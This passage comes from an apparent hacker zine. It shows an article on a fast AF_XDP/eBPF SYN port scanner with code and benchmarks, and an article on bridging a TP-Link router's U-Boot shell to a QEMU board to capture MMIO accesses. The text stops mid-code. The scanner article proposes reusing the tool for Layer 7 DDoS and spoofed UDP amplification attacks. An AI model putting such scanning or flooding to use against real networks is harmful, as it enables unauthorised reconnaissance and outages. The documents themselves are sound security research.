x86_64 in the works too. In particular, there is the CherIoT (CHERI Internet-Of-Things) project [7] which uses the RISC-V CHERI extension to power an IoT platform. This project makes extensive use of the compartmentalisation feature of CHERI that I briefly mentioned earlier in the article. This is a method of process isolation using sealed capabilities without having to separate processes into different memory spaces. It's also worth taking a look at the output of `./cheribuild.py --list-targets` - there are already build definitions for things like Apache, Nginx, KDE Plasma, Wayland, FFmpeg, and even DOOM! ## Closing Thoughts First of all, if you've made it this far - thank you! I hope you found this read worth your time and that you learnt something - even if it was just to scratch that itch to understand a little better what this CHERI thing is all about. That's certainly why I chose to take a look at it. If CHERI takes off in the consumer space in the future, I think bug hunters and xdevs alike will enjoy the new challenged posed by it. And if it doesn't take off, then it will still remain an interesting experiment that we can continue to play with in VMs. Obligatory shoutouts go to netspooky, dnoiz, hermit, gren, srsns, bane, remy, computeruser, zeta, chill, buses, rqu, iximeow, ilya, kyo and The Binary Golf Association (you should go play Binary Golf [8]). ## Links and References
|=-----------------------------------------------------------------------=| |=-------------=[ 5 - High-Performance Network Scanning ]=---------------=| |=-------------------------=[ With AF_XDP ]=-----------------------------=| |=-----------------------------------------------------------------------=| |=---------------------------=[ c3l3si4n ]=------------------------------=| |=-----------------------------------------------------------------------=| -- Table of contents 0 - Introduction 1 - The Slow Path: Traditional Scanning Methods 1.0 - Per-Connection Syscall Overhead 1.1 - Inefficient Packet Filtering with AF_PACKET 2 - Kernel Bypass and Fastpath Architectures 2.0 - Full Kernel Bypass: DPDK 2.1 - The Kernel Fastpath: XDP 2.2 - XDP Internals: Actions and Modes 2.3 - AF_XDP: A Zero-Copy Bridge to Userspace 3 - Building the Scanner 3.0 - Core Design 3.1 - The eBPF Filter Component 3.2 - The Userspace Application 3.2.0 - Setup and Initialization 3.2.1 - The Packet Transmission Loop 3.2.2 - The Packet Reception Loop 4 - Performance Analysis 4.0 - A Note on Benchmarking 4.1 - Head-to-Head: AF_XDP vs. masscan 5 - Extending the AF_XDP Framework 5.0 - High-Speed HTTP/HTTPS Application Fuzzing and L7 DDoS 5.1 - Stateless UDP Fuzzing and DDoS Amplification 5.2 - High-Entropy SYN Flooding 6 - Caveats and Considerations 7 - Conclusion 8 - References 9 - Source Code --[ 0 - Introduction The network scanner has always been a fundamental tool in my arsenal. As network interface speeds have increased, I found my tools were constrained by the overhead of the operating system's kernel network stack. This has become a significant bottleneck when doing internet-scale scans. In this article, I describe the method I used to build a high-performance port scanner using the Linux kernel's eBPF and AF_XDP subsystems. This approach creates a kernel fastpath that bypasses the traditional network stack, allowing my application to interact more directly with the network driver for line-rate filtering and zero-copy data transfer. --[ 1 - The Slow Path: Traditional Scanning Methods ---[ 1.0 - Per-Connection Syscall Overhead My work began by analyzing the conventional port scanning method, which uses the connect() syscall. For each port, the application creates a socket, initiates a TCP handshake, and waits for the kernel to report the outcome. Every socket() and connect() call is a context switch into the kernel, consuming CPU cycles and introducing significant latency, making it impractical for my purposes. ---[ 1.1 - Inefficient Packet Filtering with AF_PACKET I then examined raw sockets (AF_PACKET), which allow a userspace application to receive raw link-layer frames, bypassing the kernel's high-level network stack. While this is an improvement for SYN scanning, it does not provide the performance of a true kernel bypass. Packets are still delivered via the standard kernel data path, which involves overhead from context switches and memory copies for every packet received by the interface. This inherent slowness compared to a direct kernel bypass was unacceptable for my goals. --[ 2 - Kernel Bypass and Fastpath Architectures ---[ 2.0 - Full Kernel Bypass: DPDK To achieve maximum performance, some frameworks like the Data Plane Development Kit (DPDK) implement a full kernel bypass. They use custom Poll-Mode Drivers (PMDs) that unbind a network interface from the kernel's control, giving a userspace application exclusive access. While this is very fast, it comes with drawbacks: it requires custom drivers, is invasive to the system, and often requires pinning a CPU core at 100% utilization for polling. ---[ 2.1 - The Kernel Fastpath: XDP It is important to clarify that AF_XDP is not a kernel bypass in the same vein as DPDK. It is a highly efficient kernel fastpath that works in cooperation with existing kernel drivers. My XDP program is an eBPF program attached to a low-level hook in the network driver, triggered for every incoming packet at the earliest possible point. ---[ 2.2 - XDP Internals: Actions and Modes Once my eBPF program is running at the XDP hook, it can inspect the raw packet data and return a verdict that determines the packet's fate. The primary actions are XDP_PASS, XDP_DROP, XDP_TX, and XDP_REDIRECT. The XDP_REDIRECT action is what allows my program to forward a packet to an AF_XDP socket in userspace. You can load XDP programs in three modes, which affects performance: - Native XDP: The program is loaded directly by a supported network card driver, providing the highest performance. - Offloaded XDP: The program is offloaded to and executed directly on the NIC hardware, requiring specific SmartNICs. - Generic XDP: The program is hooked later in the kernel's network path, after an sk_buff has been allocated. This mode serves as a fallback for testing or for use on unsupported hardware. ---[ 2.3 - AF_XDP: A Zero-Copy Bridge to Userspace AF_XDP is the kernel feature I used to create a high-performance data path between my XDP program and my userspace application. This is achieved through a shared memory region called a UMEM, which I allocate in userspace and register with the kernel. This UMEM is where all my packet data lives. The communication is orchestrated by a set of four single-producer, single- consumer rings: - RX Ring: The kernel places descriptors here for incoming packets that my XDP program has redirected. - TX Ring: I place descriptors here for packets I want to send. The kernel picks them up and transmits them. - FILL Ring: I place descriptors for empty UMEM frames on this ring to give the buffers to the kernel for receiving new packets. - COMPLETION Ring: After the kernel has sent a packet from my TX ring, it places the descriptor on this ring to signal that the UMEM frame can be reused. This architecture allows me to shuttle packets back and forth with the NIC driver while minimizing memory copies and context switches. --[ 3 - Building the Scanner ---[ 3.0 - Core Design My demonstration scanner is composed of two primary components: an eBPF+XDP filter in C and a userspace packet sender in Go. The core design separates the logic for efficiency. My eBPF filter is loaded onto the NIC to inspect incoming TCP packets and redirect only the replies relevant to the scanner. My Go application then manages the AF_XDP socket, populates the FILL ring, sends SYN packets via the TX ring, and processes the replies from the RX ring. This division of labor places the performance-critical filtering in the kernel, while I handle the more complex state and I/O logic in userspace. ---[ 3.1 - The eBPF Filter Component My eBPF code is designed for efficiency and simplicity.
// file: bpf/xdp_filter.c
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/tcp.h>
// This MUST match the -srcport flag in my Go program.
#define FILTER_PORT 54321
// Map to hold the file descriptor of my AF_XDP socket.
struct {
__uint(type, BPF_MAP_TYPE_XSKMAP);
__uint(key_size, sizeof(__u32));
__uint(value_size, sizeof(__u32));
__uint(max_entries, 1);
} xsks_map SEC(".maps");
SEC("xdp")
int xdp_port_filter(struct xdp_md *ctx) {
void *data_end = (void *)(long)ctx->data_end;
void *data = (void *)(long)ctx->data;
struct iphdr *ip = data + sizeof(struct ethhdr);
struct tcphdr *tcp;
if ((void*)ip + sizeof(*ip) > data_end)
return XDP_PASS;
if (ip->protocol != IPPROTO_TCP)
return XDP_PASS;
tcp = (void *)ip + ip->ihl * 4;
if ((void *)tcp + sizeof(*tcp) > data_end)
return XDP_PASS;
if (tcp->dest == bpf_htons(FILTER_PORT))
return bpf_redirect_map(&xsks_map, 0, 0);
return XDP_PASS;
}
---[ 3.2 - The Userspace Application The PoC Go application orchestrates the entire scanning process. ----[ 3.2.0 - Setup and Initialization Before any packets fly, a sequence of setup steps must be performed. First, I parse the arguments for the interface, targets, and ports. Then, I load my compiled xdp_filter.o program and attach it to the specified interface. The core setup involves creating the AF_XDP socket, then allocating and registering the UMEM via the XDP_UMEM_REG setsockopt call. Following that, I set the sizes of the four rings and mmap them into my application's address space. With the socket ready, I register its file descriptor into the eBPF map so the kernel knows where to redirect packets. Finally, since my tool operates at Layer 2, I must manually resolve the gateway's MAC address via ARP. ----[ 3.2.1 - The Packet Transmission Loop Instead of sending packets one by one, we can send packets in large batches to amortize the cost of syscalls.
// file: cmd/portscanner/main.go (conceptual)
// A template packet is pre-crafted to avoid building from scratch every
time
packer, _ := newSynPacker(srcMAC, gatewayMAC, srcIP, srcPort)
// Ensure COMPLETION ring is checked to reclaim UMEM frames for reuse
check_completion_ring_and_refill_umem();
for outstandingCount > 0 {
numFree := xsk.NumFreeTxSlots()
if numFree > 0 {
descs := xsk.GetDescs(min(numFree, BATCH_SIZE), false)
for i := range descs {
target := getNextTarget()
frame := xsk.GetFrame(descs[i]) // Pointer to shared memory
packer.pack(frame, target.ip, target.port, randomSeq())
descs[i].Len = pktLen
}
xsk.Transmit(descs)
}
}
----[ 3.2.2 - The Packet Reception Loop My receive loop, running in a dedicated goroutine, can be simple because the eBPF program has already handled the filtering.
// file: cmd/portscanner/main.go (conceptual)
// Pre-populate the FILL ring with available UMEM frames
populate_fill_ring();
for {
numRx, _, err := xsk.Poll(10) // 10ms timeout
if numRx > 0 {
rxDescs := xsk.Receive(rxDescs)
for _, desc := range rxDescs {
frame := xsk.GetFrame(desc)
ip, port, status := processPacket(frame)
if status == "open" || status == "closed" {
updateStatus(ip, port, status)
}
}
// Return the now-empty frame descriptors to the kernel's FILL ring
xsk.Fill(rxDescs)
}
}
--[ 4 - Performance Analysis ---[ 4.0 - A Note on Benchmarking To validate this architecture, a performance comparison is necessary. I chose masscan as the benchmark, as it represents the gold standard for high-speed, internet-scale scanning. It must be stated that masscan is a mature, highly-tuned project. It has years of optimization in its custom networking code and supports advanced kernel-bypass techniques such as PF_RING with DNA drivers. This driver DMAs packets directly from user-mode memory to the network driver with zero kernel involvement, allowing it to transmit at the maximum rate the hardware allows. Therefore, the goal here is not to "beat" masscan, but to determine if an AF_XDP-based tool, even as a proof-of-concept, can be competitive and where its architectural strengths lie. The benchmark consists of two scenarios: a high-density scan against a single host (45.33.32.156) on all 65,535 ports, and a wide-range scan against a /9 network (8.3 million IPs) on a single port. ---[ 4.1 - Head-to-Head: AF_XDP vs. masscan A critical factor in masscan's design is a built-in 10-second delay at the end of each scan to receive late-arriving packets. -------------------------------------------------------------------------- rate: 0.00-kpps, 100.00% done, waiting 10-secs, found=3 ~ -------------------------------------------------------------------------- When this delay is factored out to compare raw transmission times, the results are revealing. For the wide-range /9 scan, masscan clocked in at 69.2 seconds total, meaning its active scanning time was only ~59.2 seconds. -------------------------------------------------------------------------- real 1m9.174s -------------------------------------------------------------------------- My XDP scanner completed the same task in 68.3 seconds. In this scenario, where the bottleneck is spread across millions of IPs, masscan's years of optimization give it a clear edge. However, the high-density scan against a single host tells a different story. Here, masscan's active scanning time was ~2 seconds (12 seconds of total time minus the 10-second delay). -------------------------------------------------------------------------- real 0m12.163s -------------------------------------------------------------------------- My AF_XDP scanner finished in just ~1.3 seconds. ~ The victory for the AF_XDP scanner here was not just in speed, but also in accuracy. My scanner consistently identified all four open ports on the target in every run: -------------------------------------------------------------------------- OPEN: 45.33.32.156:22 OPEN: 45.33.32.156:9929 OPEN: 45.33.32.156:80 OPEN: 45.33.32.156:31337 -------------------------------------------------------------------------- In contrast, masscan's high rate caused it to miss ports, finding a different number of open ports on different runs: -------------------------------------------------------------------------- 1st scan: 0.00-kpps, 100.00% done, waiting 0-secs, found=3 2nd scan: 0.00-kpps, 100.00% done, waiting 0-secs, found=2 -------------------------------------------------------------------------- This outcome directly validates the AF_XDP architecture. The performance gains are a result of several combined optimizations. The kernel-level eBPF filter drops unwanted traffic at the earliest possible point. The zero-copy UMEM and batched ring operations nearly eliminate syscall overhead. This is why the PoC excels in the high-density test: the per-packet overhead is so low that it can saturate a single target more effectively and reliably than a tool tuned for internet-wide distribution. While the XDP scanner is just a proof-of-concept, it shows that with further development, this architecture holds potential. --[ 5 - Extending the AF_XDP Framework ---[ 5.0 - High-Speed HTTP/HTTPS Application Fuzzing and L7 DDoS The architecture developed for this scanner serves as a foundation for other high-performance network applications, particularly for security research and testing. The framework can be extended to handle stateful protocols by implementing a TCP stack in userspace. This involves managing sequence numbers, ACKs, windowing, and state transitions. This userspace TCP stack then serves as a transport layer for higher-level protocols. To interact with HTTPS services, a TLS library (e.g., OpenSSL) can be integrated by redirecting its I/O from kernel sockets to the userspace TCP stack. In OpenSSL, this can be done using a custom BIO (Basic I/O abstraction). The BIO_read and BIO_write callbacks would then interface with the userspace TCP stack's send/receive buffers, not with read() or write() syscalls. With such a setup, you could use AF_XDP to create a high-speed application-layer fuzzer. For content discovery, one could pipeline a massive number of fuzzed HTTP requests over multiple, persistent HTTPS connections, achieving a request-per-second rate far higher than conventional tools like ffuf or gobuster. This same capability can be used for Layer 7 DDoS attacks, exhausting resources by flooding it with the highest RPS you can achieve. ---[ 5.1 - Stateless UDP Fuzzing and DDoS Amplification UDP protocols are an even simpler target due to their stateless nature. For these, the packet crafting engine can be adapted to fuzz any UDP service or execute DDoS reflection/amplification attacks by spoofing the source IP and generating requests at a massive rate. There's no complex state to maintain, just packet generation. This lays the foundation that creating AF_XDP programs to interact with UDP protocols is architecturally easier to implement. Several tools already use this concept to bruteforce DNS records in a faster way for example (e.g sanicdns, pugdns). --[ 6 - Caveats and Considerations This approach has several requirements and trade-offs. Root privileges are mandatory to load eBPF programs and create AF_XDP sockets so you wouldn't be able to use it on a unprivileged session. The implementation complexity is high, as your application is now responsible for everything from ARP resolution to MAC address management. Performance is also heavily reliant on having a modern kernel and a NIC driver that supports native AF_XDP and since that's a relatively recent feature on the kernel, you won't be able to run it on any system. --[ 7 - Conclusion By combining the filtering capabilities of eBPF at the XDP hook with the zero-copy architecture of AF_XDP, it is possible to build network applications that far exceed the performance of traditional socket-based programs. My port scanner serves as a practical example of this paradigm. Unlike full bypass frameworks, AF_XDP provides a more universal and less invasive path to high-performance packet processing by integrating cooperatively with the mainline Linux kernel. The same principles that enable my rapid network scanning also provide a foundation for security research and attack tools. --[ 8 - References
--[ 9 - Source Code
|=-----------------------------------------------------------------------=| |=---------------------=[ 6 - MMIO in the Middle ]=----------------------=| |=-----------------------------------------------------------------------=| |=----------------------------=[ b1ack0wl ]=-----------------------------=| |=-----------------------------------------------------------------------=| --[ Table of Contents 0 - Introduction 1 - What sparked this research 2 - Looking into Das U-Boot 3 - Initial Testing 4 - Using Qemu to record MMIO transactions 5 - Discoveries 6 - Failed idea(s) 7 - Give this a try yourself! --[ 0 - Introduction System on Chips (SoCs) are very common in embedded devices, ranging from cell phones to cheap smart devices. These chips contain many subcomponents within them such as flash memory, network chips, modems, ...etc. These subcomponents are interacted with via Memory Mapped Input Output regions (MMIO) which is a fancy way of saying "Memory Address 0x00000004 is mapped to register 'X' for component 'Y'. The target for this article is the TP-Link WR940N wireless router. This device has a fairly old processor in it, the "TP9343", which is actually a Qualcomm Atheros QCA956x SoC. Even though the target device in this article is outdated, the technique I am about to describe can be applied to different types of embedded devices where the bootloader can easily be changed, or has the ability to read and write to physical memory. --[ 1 - What sparked this research A while back, @hyprdude and I were doing some reconnaissance on the router. hyperdude found that the GPL tarball [1] published by TP-Link was fully loaded, and included the modified Linux kernel and Das U-Boot sources used on the device. This discovery sparked an idea of creating a custom Qemu board for this particular chipset, which will help us understand the initial MMIO regions that the bootloader writes and reads to when it's first powered on (e.g. making an LED blink different colors.) A custom board will also give us the ability to debug the kernel and kernel modules, because the pins for E-JTAG were not working. After looking at the bootloader's source code, it was obvious why the pins were not working. The following code is executed upon startup, which disables the E-JTAG ports on the device via multiplexing.
[board956x.c]
#define GPIO_FUNC 0x1804006c
/* set non-JTag */
li t0, GPIO_FUNC
lw t1, 0(t0) li t2, (1<<1) /* we useGPIO14/GPIO15, so disable JTAG*/
or t1, t1, t2
sw t1, 0(t0)
By looking at the code, we can note that the MMIO address 0x1804006c is the `GPIO_FUNC` register. This register may be responsible for GPIO input multiplexing, but without a datasheet it's all just guesses from prior experiences. Luckily, there was a datasheet posted on a Github repo [2] for the QCA9563 chip, which specifies that `bit 1` at address `0x1804006c` is for disabling JTAG. Since we have the source code that actually compiles, we can simply modify Das U-Boot and enable JTAG. But, the goal is to achieve kernel debugging without touching the hardware, even though it should be possible to access E-JTAG before the above ASM statements are executed. --[ 2 - Looking into Das U-Boot While looking for more hints about the MMIO regions, I decided to analyze the modified source code for the bootloader within the GPL tarball. If the following keywords are defined: - `CONFIG_AUTOBOOT_KEYED` - `CONFIG_BOOTDELAY` - `CONFIG_AUTOBOOT_STOP_STR` or `CONFIG_AUTOBOOT_STOP_STR2` Then the string defined in `CONFIG_AUTOBOOT_STOP_STR*` needs to be sent to the console before the countdown defined in CONFIG_BOOTDELAY reaches zero. (this reminds me of the game NFL Blitz where you can press in a code before the match begins) For the WR940Nv6, the string `tpl` is defined and needs to be sent within 1 second after the `CONFIG_AUTOBOOT_PROMPT` is displayed. Doing this manually has a low success rate, but using python to spam the string `tpl` over and over again via a serial adapter has a very high success rate! This drops us into a Das U-boot shell which gives us read and write access to physical memory via the `md` and `mw` commands. Awesome! The code for the `md` and `mw` commands can be found in `/ap151/boot/u-boot/common/cmd_mem.c` within the GPL tarball for the WR940Nv6. --[ 3 - Initial Testing To make sure that the newly discovered Das U-Boot shell can actually read and write to physical memory I decided to write to address `0x18040008` which corresponds to the `GPIO_OUT` register. This address is marked as "read-only" in the datasheet, so I looked at the Das U-Boot code to find any hints to help me confirm this is true. Within the `led.S` file the address `0x18040008` is labeled as `GPIO_OUT` which lines up with the datasheet, but then they write the value `0xc000` to it with a comment that says that the LED will turn orange. The value `0xc000` has bits 14 and 15 set, which could mean that GPIO output ports 14 and 15 are "ON" which turns on the LED, but why is it orange? Well, the LED is a three pin multi-colored LED with two different colors, red (but it looks orange irl) and blue. By providing power to one of the pins, we can enable the red (orange) LED. Since this code is made to support different versions of the WR940N (which all have different LED configurations) they set both GPIO 14 and 15 to ON, but only one pin is needed to make the red LED turn on, so the red pin is connected to either GPIO pin 14 or 15. Through trial and error it was found that GPIO pin 14 on the WR940Nv6 is the red LED and pin 19 is the blue LED! There's a statement within `led.S` that says to turn all of the "WAN" LEDs blue via `~((1<<3) | (1<<14) | (1<<4) | (1<<5) | (1<<6) | (1<<7))`, and through trial and error it was discovered that GPIO pin 19 turns on the blue LED and setting pins 14 and 19 will make the LED turn purple! Even though this test seems a bit silly, it verifies that the Das U-boot shell can write to MMIO regions and they actually work! The following diagram shows how the test was conducted: ||====[UART (Das U-Boot Shell)] || \ | / vv +------------+ /---------\ | |---------GPIO 14------->| | | | \ LED / | QCA956x | | | | | |---------GPIO 19------------->| | | |-----------GND------------------->| +------------+ | | | After this test, I created a python script that connects to a UART serial adapter via the `serial` module and accepts commands to read or write 4 bytes of data to memory via a TCP socket. Using this approach is expected to be slow, but if this works then I can integrate all of it in C via libftdi or libusb and eliminate the need of using a socket and python. Make it work first, then make it fast later. Code: NOTE: The code below is only part of the final MITM python script.
def read_from_phy_memory(ser, address):
print(f'[*] Reading from Address: 0x{address:08X}...')
ser.write(bytes(f"md 0x{address:08X}1\n","UTF-8"))
out = get_response(ser) offset = out.rfind(bytes(f'{address:08x}:
',"UTF-8"))
value = int(b'0x' + out[offset + len(bytes(f'{address:08x}: ',
"UTF-8")):offset + len(bytes(f'{address:08x}:',"UTF-8")) + 8], 16)
logging.debug(f"READ: 0x{address:08X}:0x{value:08X}")
return value
def write_to_phy_memory(ser, address, value):
print(f'[*] Writing to Address: 0x{address:08X} with value \
0x{value:08X}...')
logging.debug(f"WRITE: 0x{address:08X}: 0x{value:08X}")
ser.write(bytes(f"mw 0x{address:04X} 0x{value:04X}\n","UTF-8"))
def listen_and_respond(ser, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
s.bind(("0.0.0.0", port))
except socket.error as msg:
print('[-] Bind failed. Error Code : ' + str(msg[0]) + \
' Message ' + msg[1])
return False
s.listen(1)
print (f'[*] Socket now listening on port {port}')
while True:
conn, addr = s.accept()
msg = conn.recv(1024)
while len(msg) > 0:
if msg == b'exit\n':
conn.send(bytes('[*] Byeeeeee\n', "UTF-8"))
conn.close()
break
if msg == b'shutdown\n':
conn.send(bytes('[*] The server is going down down\n',
"UTF-8"))
conn.close()
s.shutdown(socket.SHUT_WR)
s.close()
return
elif msg[0] == ord('r'):
# Read Bytes
addr = int(msg[1:].strip(b'\n'), 16)
out = read_from_phy_memory(ser, addr)
conn.send(bytes(hex(out), "UTF-8"))
elif msg[0] == ord('w'):
# Write Bytes
address = msg[1:].split(b" ")[0]
value = msg[1:].split(b" ")[1].strip(b'\n')
write_to_phy_memory(ser, int(address, 16), int(value, 16))
conn.send(b'1')
msg = conn.recv(1024)
--[ 4 - Using Qemu to record MMIO transactions To help speed up development, I copied the `mipssim.c` board within the `qemu/hw/mips` directory and used it as a skeleton. From there I reviewed the documentation for Qemu to learn the memory APIs. All that was needed to make a MMIO region is to first call `memory_region_init_io()` with the MemoryRegion *pointer (comes from g_new(MemoryRegion,1)), a struct that contains the `.read.`, `.write.`, callbacks populated (struct MemoryRegionOps), the name of the region for Qemu to use (e.g. "DDR"), and then the size of the region. An Object can be supplied to the second argument which is passed to the callbacks, but that isn't needed at this stage. However, it'll be needed when implementing the logic for the virtual component. Lastly a call to `memory_region_add_subregion()` needs to be called for the subregion to be applied to the main memory space (return value of get_system_memory()). The following code Qemu snippet demonstrates registering the subregion for the GPIO registers:
[...]
/* MMIO Callbacks for GPIO */
// READ
static uint64_t gpio_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
return 0; // return 0 for all reads in the GPIO region
}
// WRITE
static void gpio_mmio_write(void *opaque, hwaddr addr,
uint64_t val, unsigned size)
{
// The addr argument is an offset within the MMIO region
// 0x44 == 0x18040044
if (addr == 0x44){ // Skip this register since this breaks MITM MMIO
return;
}
return;
}
// Struct for Callbacks + Endianness
static const MemoryRegionOps gpio_mmio_ops = {
.read = gpio_mmio_read,
.write = gpio_mmio_write,
.endianness = DEVICE_BIG_ENDIAN
};
// Get physical memory
MemoryRegion *address_space_mem = get_system_memory();
// Init GPIO region
memory_region_init_io(gpio_mmio, NULL, &gpio_mmio_ops, NULL, "GPIO_MMIO",
0x70);
// Add subregion to physical memory
memory_region_add_subregion(address_space_mem, 0x18040000LL, gpio_mmio);
// Reads and writes to GPIO will trigger the callbacks during runtime.
[...]
With the regions mapped with callbacks, the next step is to connect Qemu to the MITM script. This can be accomplished when the virtual board is being initialized by creating a socket, saving the socket fd, connecting to the python listener, and return. Then, within the callbacks, the socket fd is used to request reads and writes to physical memory from the python listener. This is how it's all connected: +----------+ +----------+ +----------+ | Qemu |<-TCP->| Python |<-UART->| Router | | | | | | U-Boot | +----------+ +----------+ +----------+ Note: If a datasheet could not be found for this SoC in this paper then I would register one large MMIO callback region starting at an address that crashes when an running from a found entry point. (e.g. Address: 0x18000000 Size: 0x18000000 [0x18000000-0x30000000]) --[ 5 - Discoveries The initial discovery that was already mentioned is that the datasheet and source code don't line up 100%, it's more like 90%. Besides that, it was found that the DDR region (0x18000000) is reported as 0x128 bytes in size, but there's an additional register (DDR3_CONFIG) that lives at `0x1800015C`, so there's either undocumented registers between `0x128-0x15c` or that particular memory space is unused. Another discovery was the region that wasn't fully documented within the datasheet, but I've labeled it as `GMAC1` which lives at `0x1A000000` with size `0x2E8` since the values written are very close to the values written to the `GMAC0` region (0x19000000). The virtual device actually gets pretty far within the boot process, but fails during the initialization of the WiFi driver. Since we're just capturing MMIO transactions, the thing that's missing are the interrupts that need to be used when certain conditions happen for each subcomponent. (e.g. Raise an interrupt for when a certain register for a clock reaches zero during calibration.) The GPIO address `0x18040044` is labeled `UART0_SIN Multiplexing` and the usage is to set which GPIO pins are used for UART0. During the boot process this register is written to and breaks the UART connection that used to interact with Das U-Boot. Adding a statement to skip offset `0x44` for this region is needed to continue booting from Das U-Boot and into Linux (virtually). This approach allows us to utilize a component of the SoC in real life while being able to emulate all of the other subcomponents that we're not interested in. (e.g. utilize the device's Ethernet Ports + Controller, but emulate the rest of the other subcomponents) --[ 6 - Failed ideas My first idea was to use `/dev/mem` to read and write to physical memory, but attempting to write to physical memory would result in a segfault. Reading from these regions was fine, but writing as a no-go. Plus, the OS is fully loaded with running drivers, so these regions are constantly being used. Attempting to read and write could cause unpredictable system instability, so leveraging the bootloader seemed like a better idea. No drivers, No OS, just GPIO pins :) I then attempted to bit bang GPIO pins for E-JTAG with an Arduino nano, but this resulted in nothing being found :( --[ 7 - Give this a try yourself! * Turn off the WR940Nv6 * Connect a serial adapter to the UART pins * Note: There are two jumpers that need to be soldered to complete the circuit for RX/TX * Run the script below to drop the WR940Nv6 into the Das U-Boot shell * Turn on the Router via the button on the back of the router * Note: If the script doesn't detect a shell within a few seconds then reboot the router and it should work * Connect to port TCP port 1337 once the script detects a Das U-boot shell * Send the string `w0x18040008 0x00080000` to turn the front LED blue * Send the string `w0x18040008 0x00004000` to turn off the front LED * Send `shutdown` to close the server socket and exit * MMIO MITM Python Code:
import serial
import time
import socket
import logging
### CONSTS ###
GPIO_OUT = 0x18040008
logger = logging.getLogger(__name__)
logging.basicConfig(filename='bootup.log',
format='"%(asctime)s;%(message)s',
datefmt="%H:%M:%S", filemode='w',
encoding='utf-8', level=logging.DEBUG)
def get_response(ser):
time.sleep(0.02)
out = b""
while ser.inWaiting() > 0:
out += ser.read(1)
return out
def read_from_phy_memory(ser, address):
print(f'[*] Reading from Address: 0x{address:08X}...')
ser.write(bytes(f"md 0x{address:08X} 1\n","UTF-8"))
out = get_response(ser)
offset = out.rfind(bytes(f'{address:08x}: ',"UTF-8"))
value = int(b'0x' + out[offset + len(bytes(f'{address:08x}: ',
"UTF-8")):offset + len(bytes(f'{address:08x}: ',"UTF-8")) + 8], 16)
logging.debug(f"READ: 0x{address:08X}: 0x{value:08X}")
return value
def write_to_phy_memory(ser, address, value):
print(f'[*] Writing to Address: 0x{address:08X} with value \
0x{value:08X}...')
logging.debug(f"WRITE: 0x{address:08X}: 0x{value:08X}")
ser.write(bytes(f"mw 0x{address:04X} 0x{value:04X}\n","UTF-8"))
time.sleep(0.01)
def test_uboot_cmd_line(ser, test_string):
ser.write(bytes(f"{test_string}\n","UTF-8"))
out = get_response(ser)
if bytes(f'Unknown command \'{test_string}\'', "UTF-8") in out:
return True
def spam_tpl_for_uboot(ser, max_attempts):
while True:
ser.write(b'tpl')
out = get_response(ser)
if b"ap151>" in out:
print(f"[+] Router is now in [REDACTED] state with \
{max_attempts} attempts remaining.")
return True
max_attempts -= 1
if max_attempts == 0:
print("[-] Unable to get the router into the [REDACTED] state. \
Try Rebooting...")
return False
def listen_and_respond(ser, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
s.bind(("0.0.0.0", port))
except socket.error as msg:
print('[-] Bind failed. Error Code : ' + str(msg[0]) + \
' Message ' + msg[1])
return False
s.listen(1)
print (f'[*] Socket now listening on port {port}')
while True:
conn, addr = s.accept()
msg = conn.recv(1024)
while len(msg) > 0:
if msg == b'exit\n':
conn.send(bytes('[*] Byeeeeee\n', "UTF-8"))
conn.close()
break
if msg == b'shutdown\n':
conn.send(bytes('[*] The server is going down down\n',
"UTF-8"))
conn.close()
s.shutdown(socket.SHUT_WR)
s.close()
return
elif msg[0] == ord('r'):
# Read Bytes
addr = int(msg[1:].strip(b'\n'), 16)
out = read_from_phy_memory(ser, addr)
conn.send(bytes(hex(out), "UTF-8"))
elif msg[0] == ord('w'):
# Write Bytes
address = msg[1:].split(b" ")[0]
value = msg[1:].split(b" ")[1].strip(b'\n')
write_to_phy_memory(ser, int(address, 16), int(value, 16))
conn.send(b'1')
msg = conn.recv(1024)
def splash():
print('[~ * ~ [WR940N MMIO MITM] ~ * ~]')
print('[>>>>>>>>>>> by: b1ack0wl <<<<<<<<<<<]')
def main():
ser = serial.Serial(
port='/dev/ttyUSB1', # Note: Change this for your USB serial device
baudrate=115200
)
already_open = test_uboot_cmd_line(ser, "0wl")
ser.isOpen()
if (already_open != True):
print(f'[*] Attempting to get the WR940N into the Das U-Boot shell...')
if (spam_tpl_for_uboot(ser, 5000) == False):
ser.close()
return
else:
print(f"[*] Router is already in the Das U-boot shell :D")
ser.write(b'\n\n')
listen_and_respond(ser, 1337)
if __name__ == '__main__':
splash()
main()
print('[*] - Done')
This is the Qemu board code. * It needs to be put in the `qemu/hw/mips` folder. * NOTE: Only GPIO, SPI, and DDR are mapped, it is up to the reader to complete the rest
/*
* System emulation for the WR940N V6 board, but stripped for Phrack
* by b1ack0wl <3
*/
#include "qemu/osdep.h"
#include "qapi/error.h"
#include "qemu/datadir.h"
#include "exec/address-spaces.h"
#include "hw/clock.h"
#include "hw/mips/mips.h"
#include "net/net.h"
#include "sysemu/sysemu.h"
#include "hw/boards.h"
#include "hw/loader.h"
#include "elf.h"
#include "hw/sysbus.h"
#include "hw/qdev-properties.h"
#include "qemu/error-report.h"
#include "sysemu/qtest.h"
#include "sysemu/reset.h"
#include "sysemu/runstate.h"
#include "cpu.h"
#include "hw/mips/wr940n.h"
int client_fd = 0; // global lol
#define BIOS_FILENAME "u-boot.bin"
static struct _loaderparams {
int ram_size;
const char *kernel_filename;
const char *kernel_cmdline;
const char *initrd_filename;
} loaderparams;
typedef struct ResetData {
MIPSCPU *cpu;
uint64_t vector;
} ResetData;
static uint64_t load_kernel(void)
{
uint64_t entry, kernel_high, initrd_size;
long kernel_size;
ram_addr_t initrd_offset;
kernel_size = load_elf(loaderparams.kernel_filename, NULL,
cpu_mips_kseg0_to_phys, NULL,
&entry, NULL,
&kernel_high, NULL, TARGET_BIG_ENDIAN,
EM_MIPS, 1, 0);
if (kernel_size < 0) {
error_report("could not load kernel '%s': %s",
loaderparams.kernel_filename,
load_elf_strerror(kernel_size));
exit(1);
}
/* load initrd */
initrd_size = 0;
initrd_offset = 0;
if (loaderparams.initrd_filename) {
initrd_size = get_image_size(loaderparams.initrd_filename);
if (initrd_size > 0) {
initrd_offset = ROUND_UP(kernel_high, INITRD_PAGE_SIZE);
if (initrd_offset + initrd_size > loaderparams.ram_size) {
error_report(
"memory too small for initial ram disk '%s'",
loaderparams.initrd_filename);
exit(1);
}
initrd_size = load_image_targphys(
